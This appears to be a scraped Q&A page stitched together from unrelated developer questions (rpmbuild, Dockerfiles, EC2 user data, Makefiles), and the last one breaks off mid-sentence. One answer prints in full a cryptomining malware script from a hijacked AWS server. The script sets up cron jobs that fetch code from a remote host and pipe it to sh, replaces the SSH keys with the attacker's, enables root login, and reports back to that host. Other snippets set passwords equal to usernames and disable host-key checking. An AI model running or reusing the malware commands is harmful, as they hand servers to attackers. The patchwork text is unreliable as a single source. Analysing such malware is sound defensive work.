I recently inherited a build server that was running fine until last week and now I'm getting some "file not found" errors. I am using "rpmbuilder" as my non-root user. When I run my build command I get the following errors:
$ rpmbuild -bb -v rpmbuild/SPECS/mist.spec
Executing(%prep): /bin/sh -e /var/tmp/rpm-tmp.fUrkkG
Executing(%install): /bin/sh -e /var/tmp/rpm-tmp.edkQrN
Processing files: mist-2.0.2-1.x86_64
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
RPM build errors:
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
I used to get a ton of output under %prep but now there's nothing. I tried using %setup without -q and still get the same output.
As far as I can tell my source files are still where they should be:
[rpmbuilder#coams-db SOURCES]$ pwd
/home/rpmbuilder/rpmbuild/SOURCES
[rpmbuilder#coams-db SOURCES]$ ls -la
total 66124
drwxr-xr-x. 3 rpmbuilder rpmbuilder 4096 Jun 23 10:08 .
drwxr-xr-x. 8 rpmbuilder rpmbuilder 4096 Feb 25 2016 ..
drwxrwxr-x. 8 rpmbuilder rpmbuilder 4096 Jun 23 10:08 mist-2.0.2
-rw-rw-r--. 1 rpmbuilder rpmbuilder 67681925 Jun 23 10:09 mist-2.0.2.tar.gz
Has anyone seen this issue before? Are there some nitpicky things I didn't know to check? Like I said I don't recall changing anything but who knows...
My spec file is below:
Name: mist
Version: 2.0.2
Release: 1
Summary: <snip>
Group: <snip>
License: GPL
URL: http://<snip>
Source0: mist-2.0.2.tar.gz
BuildArch: x86_64
BuildRoot: /home/rpmbuilder/rpmbuild/%{name}-%{version}
Requires(pre): shadow-utils
Requires: python, mysql-server, python-sqlalchemy, MySQL-python, python-requests, python-lxml, pytz, python-jsonschema
%description
Installs the MIST application.
%pre
if [ $1 = 1 ]; then
getent group mist > /dev/null || groupadd -r mist
getent passwd mist > /dev/null || useradd -r -g mist -d /opt/mist -c "MIST Console User" mist -p '<snip>'
# echo "Starting Cron Setup........."
#echo "Create temp file to hold cron currnet data"
#%define tempFile `mktemp`
#store temp file name
#TEMP_FILE_NAME=%{tempFile}
#echo "Storing crontab current data in temp file %{tempFile}"
#CRON_OUT_FILE=`crontab -l > $TEMP_FILE_NAME`
#echo "Add required cron detalis in cron temp file"
#ADD_TO_CRON=`echo "#Schedule the following cron job to <snip>:" >> $TEMP_FILE_NAME`
#Replace the http://servername.com/file.php with file path or link
#ADD_TO_CRON=`echo "*/30 * * * * python /opt/mist/assets/pull_assets.py > /dev/null 2>&1" >> $TEMP_FILE_NAME`
#echo "Storing temp cron to the crontab"
#ADD_TEMP_TO_CRON=`crontab $TEMP_FILE_NAME`
#echo "Remove %{tempFile} temp file"
#rm -r -f $TEMP_FILE_NAME
#get current crontab list for email
#%define cornDataNow `crontab -l`
#exit 0
fi
if [ $1 = 2 ]; then
/sbin/service mist stop
#cp -r /opt/mist/frontend/server/conf /opt
#rm -rf /opt/mist/frontend/server/work
fi
%preun
if [ $1 = 0 ]; then
/sbin/service mist stop
fi
%prep
%setup -q
%install
# rm -rf "$RPM_BUILD_ROOT"
echo $RPM_BUILD_ROOT
mkdir -p "$RPM_BUILD_ROOT/opt/mist"
cp -R . "$RPM_BUILD_ROOT/opt/mist"
mkdir -p "$RPM_BUILD_ROOT/var/log/MIST"
exit 0
%files
%attr(750,mist,mist) /opt/mist
%attr(400,mist,mist) /opt/mist/database/config.pyc
%attr(640,mist,mist) /opt/mist/database/mist_db.sql
%attr(640,mist,mist) /opt/mist/database/.password_complexity.conf
#/opt/mist
%doc
%post
if [ $1 = 1 ]; then
mv /opt/mist/mist_base/mist /etc/init.d
chmod 755 /etc/init.d/mist
chkconfig mist on --level 345
mv /opt/mist/database/my.cnf /etc
/usr/sbin/usermod -a -G mist mysql
/usr/sbin/setsebool allow_user_mysql_connect 1
/bin/mkdir -p /var/log/MIST/frontend
chown -R root.mist /var/log/MIST
chmod -R 775 /var/log/MIST
fi
if [ $1 = 2 ]; then
#cp -r /opt/conf /opt/mist/frontend/server
#rm -r /opt/conf
#rm /opt/mist/frontend/mist
if [ -d /opt/mist/frontend ]; then
rm -rf /opt/mist/frontend
fi
mv /opt/mist/mist_base/mist /etc/init.d
rm /opt/mist/database/my.cnf
/sbin/service mist start
fi
mv /opt/mist/mist_logging.py /usr/lib/python2.6/site-packages
chmod 644 /usr/lib/python2.6/site-packages/mist_logging.py
%postun
if [ $1 = 0 ]; then
/bin/rm -r /opt/mist
chkconfig --del mist
/bin/rm /etc/init.d/mist
/bin/rm /etc/my.cnf
/bin/rm /usr/lib/python2.6/site-packages/mist_logging.py
/bin/rm -r /var/log/MIST
/usr/sbin/userdel --force mist 2> /dev/null; true
/usr/sbin/groupdel mist
/sbin/service mysqld stop
/bin/rm -r /var/lib/mysql
/bin/sed -i '/mistDB/d' /etc/hosts
#/usr/bin/crontab -l | grep -v "#Schedule the following cron job to <snip>:" | /usr/bin/crontab -
#/usr/bin/crontab -l | grep -v "python /opt/mist/assets/pull_assets.py" | /usr/bin/crontab -
fi
%changelog
Related
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 10 months ago.
Improve this question
I'm trying to create a Dockerfile that read some URLs from an online file but when I try to use wget with the URL in a variable, it fails. If I print the variables in a console message the result is the corrects URLs.
If the variables are declared with ENV or initialized with the URL I don't have problems to use it in the wget; the problem only happens when reading URLs from a file.
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -q "www.url_online_file.com" -O url.txt \
&& while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt \
&& echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; \
&& wget -q $URL1 -O url1.zip
Error:
DEBUG URL1=www.prueba1.com
DEBUG URL2=www.prueba2.com
The command '/bin/sh -c mkdir /opt/tools /aplicaciones /deployments && wget -q "www.url_online_file.com" -O url.txt && while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt && echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; && wget -q $URL1 -O url1.zip' returned a non-zero code: 8
The file.txt structure in online_file is:
url1=www.prueba1.com
url2=www.prueba2.com
The solution was used the command wget -i to the www.url_online_file.com and modified the content of the file to:
www.prueba1.com
www.prueba2.com
The dockerfile:
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -i "www.url_online_file.com" \
&& && rm url* \
&& mv url1* url1.zip \
&& mv url2* url2.zip \
&& unzip url1.zip -d /opt/tools \
&& unzip url2.zip -d /opt/tools \
&& rm url1.zip \
&& rm url2.zip
I'm having trouble making a bash script run when adding it to the user data on an ec2 launch template. I've looked at suggestions and tried multiple approaches including AWS's suggestion using MIME multi-part in the script. I tried the #cloud-boothook directive but it only runs parts of my script on boot. The interesting part is that once the instance is booted I can run the script successfully by invoking it manually in /var/lib/cloud/instances/instance id/user-data.txt. I'm not sure what else to try so any help is appreciated. Below is my script.
#cloud-boothook
#!/bin/bash
apt-get update
pip install -I ansible==2.6.2
cd /tmp
wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
tar -xvf go1.11.linux-amd64.tar.gz
mv go /usr/lib
apt-get -y install checkinstall build-essential
apt-get -y install libreadline6-dev libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
cd /tmp
wget https://www.python.org/ftp/python/2.7.15/Python-2.7.15.tgz
tar -xvf Python-2.7.15.tgz
cd Python-2.7.15
./configure --prefix=/opt/python27myapp --enable-shared --enable-optimizations LDFLAGS=-Wl,-rpath=/opt/python27myapp/lib
make
checkinstall --pkgname=python27myapp --pkgversion=2.7.15 --pkgrelease=0 --nodoc --default make install
cd /tmp
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
/opt/python27myapp/bin/python /tmp/get-pip.py
/opt/python27myapp/bin/pip install --progress-bar=off virtualenv
set -euo pipefail
DEPLOYER="myapp"
PYTHON_DIST_PACKAGES="/usr/lib/python2.7/dist-packages"
PYTHON_SITE_PACKAGES="lib/python2.7/site-packages"
ANSIBLE_VENV_PATH="/mnt/ansible-12f"
ANSIBLE_USER="ansible"
ANSIBLE_VERSION="2.6.2.0"
ANSIBLE_USER_HOME="/home/${ANSIBLE_USER}"
TF_PLAYBOOK_REPO="git#github.com:myorg/${DEPLOYER}.git"
TF_PLAYBOOK_GITREF="2019.8.0"
TF_PLAYBOOK_OPTIONS="" # perhaps -vvvv
TF_PLAYBOOK_PATH="playbooks/twelve_factor/deploy.yml"
TF_APP_CONFIG_JSON="extra-vars.json"
TF_SCRATCH_DIR=$(mktemp -d -t tmp.XXXXXXXXXX)
TF_APP_CONFIG_PATH="${TF_SCRATCH_DIR}/config"
TF_ENVIRONMENT=""
EC2_INSTANCE_TAGS=""
CONFIG_BUCKET="databag-versions"
REGION=$(curl -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -c -r .region)
app_user="myapp"
git-with-ssm-key()
{
ssm_key="git_checkout_key"; shift
ssh-agent bash -o pipefail -c '
if aws ssm get-parameters \
--region "'$REGION'" \
--names "'$ssm_key'" \
--with-decryption \
--output text \
--query Parameters[0].Value |
ssh-add -k -
then
git "$#"
else
echo >&2 "ERROR: Failed to get or add key: '$ssm_key'"
exit 1
fi
' bash "$#"
}
#ssh-keyscan github.com >> ~/.ssh/known_hosts
# ============================================================================
cleanup() {
rm -rf $TF_SCRATCH_DIR
}
final_steps() {
cleanup
}
trap final_steps EXIT
# ============================================================================
install_packages() {
apt-get -y install jq
}
check_for_aws_cli() {
if ! aws help 1> /dev/null 2>&1; then
apt-get -y install awscli
fi
if ! aws help 1> /dev/null 2>&1; then
echo "The aws cli is not installed." 1>&2
exit 1
fi
echo "Found: $(aws --version 2>&1)"
}
application_deployed() {
[ -e "$TF_APP_HOME/current" ];
}
set_tf_app_home() {
TF_APP_HOME="$(jq .deploy_env.deploy_to $TF_APP_CONFIG_PATH | sed -e 's/^"//' -e 's/"$//')"
}
set_ec2_instance_tags() {
# We grab the EC2 tags of this instance.
instance_id=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
filters="Name=resource-id,Values=${instance_id}"
EC2_INSTANCE_TAGS=$(aws ec2 describe-tags --region $REGION --filters "${filters}" | jq .Tags)
}
set_tf_environment() {
# The tag whose Key is "Name" has the Value we want. Strip leading/trailing quotes.
name=$(echo "$EC2_INSTANCE_TAGS" | jq '.[] | select(.Key == "Environment") | .Value')
TF_ENVIRONMENT=$(echo $name | sed -e 's/^"//' -e 's/"$//')
}
set_config_bucket() {
case "$TF_ENVIRONMENT" in
innovate|production|bolt|operations|blackhat)
CONFIG_BUCKET="databag-versions"
;;
*)
CONFIG_BUCKET="databag-dev"
;;
esac
}
retrieve_configuration_source() {
# The tag whose Key is "Name" has the Value we want. Strip leading/trailing quotes.
selectName='.[] | select(.Key == "Name") | .Value'
name=$(echo "$EC2_INSTANCE_TAGS" | jq "$selectName" | sed -e 's/^"//' -e 's/"$//')
s3key="databags/$(echo $name | sed -e 's;-;/;g')"
aws s3 cp s3://${CONFIG_BUCKET}/${s3key} ${TF_APP_CONFIG_PATH}
set_git_ssh_key
set_tf_app_home
}
install_python() {
apt-get -y install python
pip install virtualenv
virtualenv $ANSIBLE_VENV_PATH
}
install_ansible() {
source ${ANSIBLE_VENV_PATH}/bin/activate
pip install ansible==${ANSIBLE_VERSION}
echo "$PYTHON_DIST_PACKAGES" > "${ANSIBLE_VENV_PATH}/${PYTHON_SITE_PACKAGES}/dist-packages.pth"
# This will go wrong if the system python path changes.
if [ ! -d "$PYTHON_DIST_PACKAGES" ]; then
echo "ERROR: the system python packages location does not exist: $PYTHON_DIST_PACKAGES"
exit 1
fi
# Having established a link between our vitualenv and the system python, we
# can now install python-apt.
pip install python-apt
}
add_playbook_user() {
if ! getent group $ANSIBLE_USER > /dev/null 2>&1; then
addgroup --system $ANSIBLE_USER
fi
if ! id -u $ANSIBLE_USER > /dev/null 2>&1; then
adduser --system --home $ANSIBLE_USER_HOME --shell /bin/false \
--ingroup $ANSIBLE_USER --disabled-password \
--gecos GECOS \
$ANSIBLE_USER
fi
if [ ! -d "$ANSIBLE_USER_HOME/.ssh" ]; then
mkdir $ANSIBLE_USER_HOME/.ssh
fi
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh
chmod 700 $ANSIBLE_USER_HOME/.ssh
echo "StrictHostKeyChecking no" > $ANSIBLE_USER_HOME/.ssh/config
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/config
# echo ${GIT_SSH_KEY} > $ANSIBLE_USER_HOME/.ssh/id_rsa
echo $GIT_SSH_KEY | sed -e "s/-----BEGIN RSA PRIVATE KEY-----/&\n/" -e "s/-----END RSA PRIVATE KEY-----/\n&/" -e "s/\S\{64\}/&\n/g" > $ANSIBLE_USER_HOME/.ssh/id_rsa
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/id_rsa
chmod 600 $ANSIBLE_USER_HOME/.ssh/id_rsa
if ! getent group $app_user > /dev/null 2>&1; then
addgroup --system $app_user
fi
if ! id -u $app_user > /dev/null 2>&1; then
adduser --system --home ${ANSIBLE_USER_HOME}/myapp --shell /bin/false \
--ingroup $app_user --disabled-password \
--gecos GECOS \
$app_user
fi
}
retrieve_playbook() {
rm -rf "${ANSIBLE_USER_HOME}/${DEPLOYER}"
(
cd "${ANSIBLE_USER_HOME}"
git-with-ssm-key /githubsshkeys/gitreader clone --branch "$TF_PLAYBOOK_GITREF" "$TF_PLAYBOOK_REPO"
)
chown -R ansible:ansible "${ANSIBLE_USER_HOME}/${DEPLOYER}"
}
patch_playbooks() {
awk '/^- name:/ {f=0} /^- name: Establish SSH credentials/ {f=1} !f;' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml > /tmp/temp_app_user.yml
cp /tmp/temp_app_user.yml ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml # temp file is necessary since awk can't edit in-place
# remove the 'singleton' run operation... this isn't a singleton, and the playbook fails on the check to determine that.
sed -i 's/^.*singleton.*$//' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app.yml
# fix the "invalid ioctl" warning, which is non-breaking but creates ugly warnings in the log
sed -i -e 's/mesg n .*true/tty -s \&\& mesg n/g' /root/.profile
# fix myapp user permissions in the /mnt/ansible-12f directories
chown -R myapp:myapp ${ANSIBLE_VENV_PATH}
# set up proper git SSH access for the ansible user
echo -e "host github.com\n HostName github.com\n IdentityFile ~/.ssh/id_rsa\n User git" >> $ANSIBLE_USER_HOME/.ssh/config
# set up the same git access for the myapp user
if [ ! -d "/mnt/myapp/.ssh" ]; then
mkdir -p /mnt/myapp/.ssh
fi
# ensure the directory will have the right permissions
mkdir -p /mnt/myapp/releases
cp ${ANSIBLE_USER_HOME}/.ssh/* /mnt/myapp/.ssh
chown -R ${app_user}:${app_user} /mnt/myapp
}
set_git_ssh_key() {
GIT_SSH_KEY="$(aws ssm get-parameters --region $REGION --names git_checkout_key --with-decryption --query Parameters[0].Value --output text)"
ssh-keyscan github.com >> ~/.ssh/known_hosts
}
write_inventory() {
IP_ADDRESS=$(curl -s http://169.254.169.254/latest/meta-data/local-ipv4)
cat - <<END_INVENTORY | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/inventory"
[${IP_ADDRESS}]
${IP_ADDRESS} ansible_python_interpreter=${ANSIBLE_VENV_PATH}/bin/python
[linux]
${IP_ADDRESS}
# This bizarre group name will never be used anywhere.
# We need another group with an entry in it to avoid triggering
# the cmd_singleton section.
[12345_xx_%%%%_xxxx_]
10.10.10.10
END_INVENTORY
}
# Located in the directory in which ansible-playbook is executed; it is
# automatically picked up as Ansible runs.
write_ansible_settings() {
cat - <<END_SETTINGS | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/ansible.cfg"
[defaults]
inventory = /etc/ansible/hosts
library = /usr/local/opt/ansible/libexec/lib/python2.7/site-packages/ansible/modules
remote_tmp = /tmp/.ansible-${USER}/tmp
pattern = *
forks = 5
poll_interval = 15
transport = smart
gathering = implicit
host_key_checking = False
# SSH timeout
timeout = 30
# we ssh as user medidata, becoming the 12-factor user, so:
# see https://docs.ansible.com/ansible/become.html#becoming-an-unprivileged-user
allow_world_readable_tmpfiles = True
ansible_managed = Ansible managed: {file} modified on %Y-%m-%d %H:%M:%S by {uid} on {host}
action_plugins = /usr/share/ansible_plugins/action_plugins
callback_plugins = /usr/share/ansible_plugins/callback_plugins
connection_plugins = /usr/share/ansible_plugins/connection_plugins
lookup_plugins = /usr/share/ansible_plugins/lookup_plugins
vars_plugins = /usr/share/ansible_plugins/vars_plugins
filter_plugins = /usr/share/ansible_plugins/filter_plugins
fact_caching = memory
retry_files_enabled = False
[ssh_connection]
# We have sometimes an error raised: Timeout (32s) waiting for privilege escalation prompt
# To avoid this, we make multiple attempts at the connection:
retries = 5
ssh_args = -o ControlMaster=auto -o ControlPersist=60s -o ServerAliveInterval=120
control_path = %(directory)s/%%h-%%r
pipelining = False
END_SETTINGS
}
write_deployment_config() {
cat - <<END_SETTINGS > "${ANSIBLE_USER_HOME}/${TF_APP_CONFIG_JSON}"
END_SETTINGS
}
run_deployment() {
write_inventory
write_ansible_settings
write_deployment_config
(
cd ${ANSIBLE_USER_HOME}
ansible-playbook "${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
-i ${ANSIBLE_USER_HOME}/inventory \
"${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
--connection=local \
--extra-vars #${TF_APP_CONFIG_PATH}
2> /tmp/ansible.err | tee /tmp/ansible.out
)
}
# -----------------------------------------------------
# ---------------- Script Starts Here -----------------
# -----------------------------------------------------
install_packages # do we need to check if packages already installed?
check_for_aws_cli
set_ec2_instance_tags
set_tf_environment
retrieve_configuration_source
if application_deployed; then
echo "Application already deployed; taking no action"
else
add_playbook_user
install_python
install_ansible
retrieve_playbook
patch_playbooks
run_deployment
fi
chown -R ${app_user}:${app_user} /mnt/myapp/services
chown -R ${app_user}:${app_user} /etc/sv/myapp*
I think you need to add sudo before every command.
Also can you plz share the error you are getting?
I solved the problem by removing set -euo pipefail in the script.
I am using aws and last couple of days I am seeing some unnecessary scripts running. Following is screen shot attached.
I tried to killed that process by sudo kill -9 {pId} but not able to do so.
Any suggesstion
Your box got compromised.
It downloads a script to your server and runs it
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x#xmr.crypto-pool.fr:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x#xmr.crypto-pool.fr:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
As you can see it deletes all ssh keys and creates a new one for the attackers to login.
At the end of the script it reports its status to
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=uname -i`
this server again so they can look at all compromised servers at once I think
Edit:
The domain is registered in Panama. Whoopsie. I think you should check your server and get some advice regarding the security of it.
I am able only to give the first user write, executable and read access to the export folder in the below Dockerfile
...
VOLUME ["/export/"]
RUN groupadd galaxy \
&& chgrp -R galaxy /export \
&& chmod -R 770 /export
RUN useradd dudleyk \
&& mkdir /home/dudleyk \
&& chown dudleyk:dudleyk /home/dudleyk \
&& addgroup dudleyk galaxy \
&& ln -s /export/ /home/dudleyk/ \
&& echo "dudleyk:dudleyk" | chpasswd
RUN useradd lorencm \
&& mkdir /home/lorencm \
&& chown lorencm:lorencm /home/lorencm \
&& addgroup lorencm galaxy \
&& ln -s /export/ /home/lorencm/ \
&& echo "lorencm:lorencm" | chpasswd
EXPOSE 8787
CMD ["/init"]
I logged to the docker container with docker run -it -v /home/galaxy:/export rstudio bash and it showed me the following
ls -ahl
drwxr-xr-x 43 dudleyk galaxy 4.0K Apr 8 00:09 export
How do I give the second user write, executable and read access to the export?
Thank you in advance
First of all, I am not sure that what I am going to ask is my problem. Perhaps it is something else, so, please, don't hesitate to point that out. I think that the place I went wrong is the clean target of my Makefile, but it could be something else entirely.
Here is what happens: after running make clean and then make few targets, which have their resulting files deleted during the clean don't rebuild. (In addition to my question I'd be interested in a way to cancel entirely all caching GNU/Make does, it has been a major pain since whenever I ever used it, and never had any positive consequences, not even once).
If I then run make again, some of the targets are rebuilt. If I run make one more time, the targets that depend on the targets built in the previous round are rebuilt and so on.
Here's the corresponding Makefile section:
PACKAGE = i-iterate
DOCDST = ${PACKAGE}/docs
HTMLDOCDST = ${PACKAGE}/html-docs
DOCSRC = ${PACKAGE}/info
IC = makeinfo
ICO = --force
TEXI2HTML = texi2html
TEXI2HTMLO = --split section --use-nodes
HTML2WIKI = html2wiki
HTML2WIKIO = --dialect GoogleCode
TEXI = $(wildcard $(DOCSRC)/*.texi)
INFO = $(addprefix $(DOCDST)/,$(notdir $(TEXI:.texi=.info)))
WIKIDST = ../wiki
HTML = $(wildcard $(HTMLDOCDST)/*.html)
WIKI = $(addprefix $(WIKIDST)/,$(notdir $(HTML:.html=.wiki)))
$(DOCDST)/%.info: $(DOCSRC)/%.texi
echo "info builds: $<"
$(IC) $(ICO) -o $# $<
$(TEXI2HTML) $(TEXI2HTMLO) $<
$(WIKIDST)/%.wiki: $(HTMLDOCDST)/%.html
$(HTML2WIKI) $(HTML2WIKIO) $< > $#
default: prepare $(INFO) move-html $(WIKI) rename-wiki byte-compile
cp -r lisp info Makefile README i-pkg.el ${PACKAGE}
prepare:
mkdir -p ${PACKAGE}
mkdir -p ${DOCDST}
mkdir -p ${HTMLDOCDST}
move-html:
$(shell [[ '0' -ne `find ./ -maxdepth 1 -name "*.html" | wc -l` ]] && \
mv -f *.html ${HTMLDOCDST}/)
rename-wiki:
$(shell cd ${WIKIDST} && rename 'i-iterate' 'Iterate' *.wiki)
$(shell find ${WIKIDST} -name "*.wiki" -exec sed -i \
's/\[i-iterate/\[Iterate/g;s/\.html\#/\#/g;s/</\</g;s/>/\>/g' \
'{}' \;)
byte-compile:
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
clean:
rm -f ./lisp/*.elc
rm -f ./*.html
rm -rf ${DOCDST}
rm -rf ${HTMLDOCDST}
rm -rf ${PACKAGE}
And here's the output:
First run
$ make
mkdir -p i-iterate
mkdir -p i-iterate/docs
mkdir -p i-iterate/html-docs
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
Wrote /home/wvxvw/Projects/i-iterate/trunk/lisp/i-iterate.elc
cp -r lisp info Makefile README i-pkg.el i-iterate
Second run
$ make
mkdir -p i-iterate
mkdir -p i-iterate/docs
mkdir -p i-iterate/html-docs
echo "info builds: i-iterate/info/i-iterate.texi"
info builds: i-iterate/info/i-iterate.texi
makeinfo --force -o i-iterate/docs/i-iterate.info i-iterate/info/i-iterate.texi
texi2html --split section --use-nodes i-iterate/info/i-iterate.texi
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
Wrote /home/wvxvw/Projects/i-iterate/trunk/lisp/i-iterate.elc
cp -r lisp info Makefile README i-pkg.el i-iterate
Third run
$ make
mkdir -p i-iterate
mkdir -p i-iterate/docs
mkdir -p i-iterate/html-docs
echo "info builds: i-iterate/info/i-iterate.texi"
info builds: i-iterate/info/i-iterate.texi
makeinfo --force -o i-iterate/docs/i-iterate.info i-iterate/info/i-iterate.texi
texi2html --split section --use-nodes i-iterate/info/i-iterate.texi
html2wiki --dialect GoogleCode i-iterate/html-docs/i-iterate_9.html > ../wiki/i-iterate_9.wiki
# ... a bunch more of the documentation pages ...
/i-iterate_5.wiki
html2wiki --dialect GoogleCode i-iterate/html-docs/i-iterate_2.html > ../wiki/i-iterate_2.wiki
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
Wrote /home/wvxvw/Projects/i-iterate/trunk/lisp/i-iterate.elc
cp -r lisp info Makefile README i-pkg.el i-iterate
As you can see, the $(INFO) isn't even entered on the first run, even though the directory where it outputs the file was just deleted and created anew. The exact same thing happens later when it (doesn't) rebuild the $(WIKI).
EDIT:
Here's the directory structure, text following # signs is comments.
|- info
| +- documentation.texi
|- lisp
| +- source.el
| +- binary.elc # generated during compile
|- docs # should be deleted and created during the build
| +- documentation.info
|- html-docs # should be deleted and created during the build
| +- documentation.html
|- i-iterate # sources are copied here for distribution
| |- info
| | +- documentation.texi
| |- lisp
| | +- source.el
An update to the original Makefile, but the problem isn't solved
TEXI = $(wildcard $(DOCSRC)/*.texi)
INFO = $(addprefix $(DOCDST)/,$(notdir $(TEXI:.texi=.info)))
WIKIDST = ../wiki
$(DOCDST)/%.info: $(DOCSRC)/%.texi
#echo "info builds: $<"
$(IC) $(ICO) -o $# $<
$(TEXI2HTML) $(TEXI2HTMLO) $<
# This rule is not applied! :(
$(WIKIDST)/%.wiki: $(HTMLDOCDST)/%.html
#echo "Wiki: $<"
$(HTML2WIKI) $(HTML2WIKIO) $< > $#
default: prepare $(INFO) move-html rename-wiki byte-compile
cp -r lisp info Makefile README i-pkg.el ${PACKAGE}
prepare:
mkdir -p ${PACKAGE}
mkdir -p ${DOCDST}
mkdir -p ${HTMLDOCDST}
move-html:
$(shell [[ '0' -ne `find ./ -maxdepth 1 -name "*.html" | wc -l` ]] && \
mv -f *.html ${HTMLDOCDST}/)
$(eval HTML := $(wildcard $(HTMLDOCDST)/*.html))
$(eval WIKI := $(addprefix $(WIKIDST)/,$(notdir $(HTML:.html=.wiki))))
#echo "HTML: $(HTML)" # prints as expected
#echo "WIKI: $(WIKI)" # prints as expected
rename-wiki: $(WIKI) # this dependency never triggers
# the $(WIKIDST)/%.wiki rule
#echo "Renaming: `ls $(HTMLDOCDST)`" # the files are there
$(shell cd ${WIKIDST} && rename 'i-iterate' 'Iterate' *.wiki)
$(shell find ${WIKIDST} -name "*.wiki" -exec sed -i \
's/\[i-iterate/\[Iterate/g;s/\.html\#/\#/g;s/</\</g;s/>/\>/g' \
'{}' \;)
Trying to execute $(WIKI) in this way doesn't trigger the correspondent rule for some reason.
And if I change rename-wiki to look something like:
rename-wiki: ../wiki/file.wiki
I get "no rule to build the target. Even though $(WIKIDIST)/%.wiki is the rule to build the target.
EDIT2:
Finally, I could achieve what I want in doing it like so:
